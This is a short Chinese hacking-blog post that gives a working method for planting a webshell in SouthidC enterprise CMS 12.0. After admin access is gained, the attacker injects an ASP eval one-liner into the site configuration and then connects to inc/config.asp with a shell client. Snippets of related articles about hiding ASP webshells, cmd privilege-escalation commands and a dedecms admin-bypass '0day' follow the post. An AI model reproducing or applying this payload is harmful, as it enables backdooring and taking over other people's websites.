南方数据企业网站管理系统12.0拿SHELL ***

hacker5年前黑客文章711

南方数据企业网站管理系统12.0插配置文件拿SHELL

在我们拿到南方数据企业管理系统后台账号密码后,可以使用下面的 *** 来拿shell

进入后台后 点击系统管理 网站配置

随便找个地方修改成

“%><%eval request(“qxz”)%><%Const nidaye=”xzlbb.com

然后用一句话客户端连接http://目标网站/inc/config.asp就OK了!

标签: 黑客技术

相关文章

HijackThis是不是适用全部电脑操作系统?

HijackThis是不是适用全部电脑操作系统?

什么叫HijackThis? HijackThis这是一个开源系统专用工具,用以检验Microsoft Windows上的广告推送和恶意程序。此专用工具以迅速扫描仪电子计算机显示信息恶意程序的普遍部...

另类隐藏保护asp大马地址方法

另类隐藏保护asp大马地址方法

我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了 或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。 如何加...

Nmap简易的扫描仪方法

Nmap简易的扫描仪方法

Nmap出示了四项基本要素(服务器发觉、端口扫描器、服务项目与版本号探测、OS探测)及丰富多彩的脚本制作库。Nmap即能运用于简易的信息网络扫描仪,也可以用在高級、繁杂、特殊的自然环境中:比如扫描仪...

黑客定位手机位置,别小瞧这些小细节

黑客便是假借黑客名义操控别人电脑的黑客技能,咱们都知道手机有定位功能,但咱们并不知道如何定位手机号码,那么今日黑客教你定位手机号码以及手机号码定位软件下载。 只是经过一个手机号,就能够精确认位出你的...

cmd提权部分常用命令

CMD部分提权常用命令 ipconfig 显示本地IP地址 net start telnet 开telnet服务 net use z:127.0.0.1c$     映射对方的C...

织梦网dedecms 0day

把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login....